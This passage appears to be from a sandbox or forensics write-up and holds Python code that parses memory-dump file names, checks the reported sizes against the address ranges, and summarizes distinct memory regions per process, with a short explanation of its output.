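        raise ValueError(f"dangling entry without a size: {lines[-1]!r}")
    dumps = []
    for name, size in zip(lines[0::2], lines[1::2]):
        m = DUMP_RE.match(name)
        if not m:
            raise ValueError(f"not a memory dump name: {name!r}")
        start, end = int(m["start"], 16), int(m["end"], 16)
        reported, tol = parse_reported_size(size)
        dumps.append({
            "pid": int(m["pid"]), "idx": int(m["idx"]), "start": start, "end": end,
            "range_bytes": end - start, "reported_bytes": reported,
            "size_ok": end > start and abs((end - start) - reported) <= tol,
        })
    return dumps


def summarize(dumps):
    """Per process: each distinct region (sorted by address), its length in bytes,
    and how many dumps cover it."""
    per_pid = defaultdict(lambda: defaultdict(int))
    for d in dumps:
        per_pid[d["pid"]][(d["start"], d["end"])] += 1
    return {
        pid: [{"start": s, "end": e, "bytes": e - s, "dumps": n}
              for (s, e), n in sorted(regions.items())]
        for pid, regions in per_pid.items()
    }


if __name__ == "__main__":
    dumps = parse_dumps(SAMPLE)
    for pid, regions in sorted(summarize(dumps).items()):
        for r in regions:
            print(f"pid {pid}: {r['start']:#018x}-{r['end']:#018x} {r['bytes']:>9} B  x{r['dumps']}")
    for d in dumps:
        if not d["size_ok"]:
            print(f"SIZE MISMATCH: pid {d['pid']} dump {d['idx']}: range {d['range_bytes']} B, "
                  f"reported {d['reported_bytes']:.0f} B")
```

On the sample this reports three distinct regions for pid 4440 (the 0x400000 region covered by two dumps, the 112KB region and the 16.0MB region) and flags only the constructed pid-9999 entry, whose 128KB range cannot round to 64KB. Run over the whole list above it gives, per process, the set of regions worth pulling from the sandbox rather than the raw count of dump files.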